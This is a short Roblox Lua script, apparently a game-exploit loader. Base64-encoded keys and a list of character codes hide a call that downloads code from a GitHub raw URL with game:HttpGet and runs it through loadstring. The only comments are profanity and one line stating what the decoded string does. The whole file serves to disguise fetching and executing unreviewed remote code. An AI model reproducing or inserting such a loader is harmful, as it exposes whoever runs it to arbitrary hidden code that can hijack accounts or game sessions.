local _ = {
  [([[bG9hZHN0cmluZw==]])] = function(b) return loadstring(b) end,
  [([[Z2FtZQ==]])] = function(u) return game:HttpGet(u) end
}

local a = '108,111,97,100,115,116,114,105,110,103,40,103,97,109,101,58,72,116,116,112,71,101,116,40,39,104,116,116,112,115,58,47,47,114,97,119,46,103,105,116,104,117,98,117,115,101,114,99,111,110,116,101,110,116,46,99,111,109,47,97,49,49,52,53,49,52,45,109,97,47,98,97,116,105,122,107,57,49,47,109,97,105,110,47,98,97,116,105,122,107,57,49,39,41,41,40,41'

-- fuck
local function decode(str)
    return str:gsub('%d+', function(c) return string.char(tonumber(c)) end):gsub(',', '')
end

local script = decode(a)  -- 结果为 loadstring(game:HttpGet('https://...'))()

-- fuck
_[([[bG9hZHN0cmluZw==]])](script)()
